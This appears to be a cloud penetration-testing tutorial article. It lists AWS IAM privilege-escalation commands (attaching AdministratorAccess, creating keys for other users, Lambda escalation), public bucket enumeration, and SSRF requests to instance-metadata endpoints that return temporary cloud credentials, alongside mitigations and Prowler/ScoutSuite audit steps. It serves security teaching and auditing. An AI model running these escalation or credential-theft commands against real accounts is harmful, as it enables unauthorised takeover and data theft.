1. Cloud Attack Surface
Cloud Attack Surface Map:
┌─────────────────────────────────────────────────────┐
│ Cloud Environment │
├──────────┬──────────┬──────────┬────────────────────┤
│ IAM │ Storage │ Compute │ Networking │
├──────────┼──────────┼──────────┼────────────────────┤
│Overly │Public S3 │SSRF → │Security Groups │
│permissive│buckets │metadata │too open │
│policies │ │service │ │
│ │Public │ │VPC peering │
│Cross-acct│blob │Exposed │misconfig │
│role │containers│APIs │ │
│confusion │ │ │Missing WAF │
│ │Exposed │Unpatched │ │
│Key │databases │images │No flow logs │
│rotation │(RDS/CosmosDB) │ │
└──────────┴──────────┴──────────┴────────────────────┘
Cloud Provider Pentest Policies:
AWS: No permission needed for most tests
(except DDoS, zone walking, large-scale)
Azure: No permission needed (standard pentest)
Must follow ROE: aka.ms/pentest-rules
GCP: No permission needed
AUP applies: cloud.google.com/aup
2. AWS IAM Misconfigurations
# --- IAM Enumeration ---
# List all IAM users
aws iam list-users --query 'Users[*].[UserName,CreateDate]'
# Check user policies
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-user
# Get inline policy document
aws iam get-user-policy --user-name target-user \
--policy-name MyPolicy
# Check for privilege escalation paths
# Using Pacu (AWS exploitation framework)
pacu
> import_keys stolen_key
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan
# --- Common IAM misconfigs ---
# 1. Wildcard permissions
# ❌ "Effect": "Allow", "Action": "*", "Resource": "*"
# 2. PassRole without restrictions
# Allows user to pass any role to a service
# ❌ "Action": "iam:PassRole", "Resource": "*"
# 3. AssumeRole trust policy too broad
# ❌ "Principal": {"AWS": "*"}
# --- AWS Privilege Escalation Techniques ---
# Method 1: Create new policy version
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
--policy-document file://admin-policy.json \
--set-as-default
# Method 2: Attach admin policy to self
aws iam attach-user-policy \
--user-name myuser \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Method 3: Create access key for another user
aws iam create-access-key --user-name admin-user
# Method 4: Lambda privilege escalation
# Create Lambda with admin role → execute to gain admin access
aws lambda create-function \
--function-name escalate \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler index.handler \
--runtime python3.12 \
--zip-file fileb://escalate.zip
3. S3 / Storage Enumeration
# --- S3 Bucket Enumeration ---
# Check if bucket exists and is public
aws s3 ls s3://target-company-data --no-sign-request 2>/dev/null
aws s3 ls s3://target-company-backup --no-sign-request 2>/dev/null
# S3 bucket naming patterns to try
# {company}-backup, {company}-data, {company}-logs
# {company}-dev, {company}-staging, {company}-prod
# {company}-assets, {company}-uploads
# Automated bucket finder
python3 cloud_enum.py -k example-company
# Check bucket ACL
aws s3api get-bucket-acl --bucket target-bucket --no-sign-request
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket --no-sign-request
# --- Azure Blob Storage ---
# Anonymous access check
curl "https://targetaccount.blob.core.windows.net/\$logs?restype=container&comp=list"
curl "https://targetaccount.blob.core.windows.net/data?restype=container&comp=list"
# --- GCP Storage ---
gsutil ls gs://target-bucket
curl "https://storage.googleapis.com/target-bucket"
4. Instance Metadata SSRF
# AWS Instance Metadata Service (IMDS)
# IMDSv1 — vulnerable to SSRF
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Response contains temporary AWS credentials:
# {
# "AccessKeyId": "ASIA...",
# "SecretAccessKey": "...",
# "Token": "...",
# "Expiration": "2026-04-01T12:00:00Z"
# }
# IMDSv2 — requires token (more secure)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/
# Azure Instance Metadata
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Azure Managed Identity token
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# GCP Metadata
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# SSRF → Cloud Credential Theft Example
# Vulnerable application accepts URL parameter
# Attacker sends:
# POST /api/fetch-image
# {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/WebAppRole"}
# Application fetches URL internally → returns IAM credentials
# Attacker now has temporary AWS credentials!
# Mitigation:
# 1. Enforce IMDSv2 (requires PUT token)
# 2. Block 169.254.169.254 in application
# 3. Use VPC endpoint policies
# 4. Validate/whitelist URLs in application
5. Prowler & ScoutSuite — Cloud Security Audit
# --- Prowler — AWS Security Assessment ---
# Install
pip install prowler
# Full AWS audit
prowler aws --output-formats html,json
# Specific compliance
prowler aws --compliance cis_2.0_aws
prowler aws --compliance gdpr_aws
prowler aws --compliance pci_3.2.1_aws
# Specific checks
prowler aws --check-group iam
prowler aws --check-group s3
prowler aws --check-group logging
# Azure audit
prowler azure --subscription-ids YOUR_SUB_ID
prowler azure --compliance cis_2.0_azure
# GCP audit
prowler gcp --project-id YOUR_PROJECT
# --- ScoutSuite — Multi-cloud audit ---
# Install
pip install scoutsuite
# AWS assessment
scout aws --profile pentest-profile
# Azure assessment
scout azure --cli
# GCP assessment
scout gcp --user-account --project-id PROJECT_ID
# Results → HTML report with findings dashboard
# Open scout-report/report.html
Cloud Pentest Checklist:
IAM:
□ Users with console access but no MFA
□ Access keys older than 90 days
□ Overly permissive policies (*, Admin)
□ Cross-account trust misconfigurations
□ Service-linked role abuse paths
Storage:
□ Public S3 buckets / blob containers
□ Unencrypted data at rest
□ Overly permissive bucket policies
□ Versioning disabled (data loss risk)
Compute:
□ IMDSv1 enabled (SSRF risk)
□ Public security groups (0.0.0.0/0)
□ Unencrypted EBS volumes
□ Outdated AMIs / container images
Networking:
□ VPC flow logs disabled
□ Default VPC in use
□ Public RDS / database instances
□ Missing WAF / DDoS protection
Logging:
□ CloudTrail / Activity Log disabled
□ GuardDuty / Defender not enabled
□ Log retention too short
□ No alerting on suspicious activity
6. Summary
- Cloud attack surface: IAM, Storage, Compute, Networking
- IAM: Enumeration, privilege escalation paths, policy analysis
- Storage: Public bucket enumeration, ACL/policy review
- Metadata SSRF: IMDSv1 credential theft, enforce IMDSv2
- Prowler + ScoutSuite: Automated cloud security auditing
The next article will go into Container & Kubernetes Security Testing.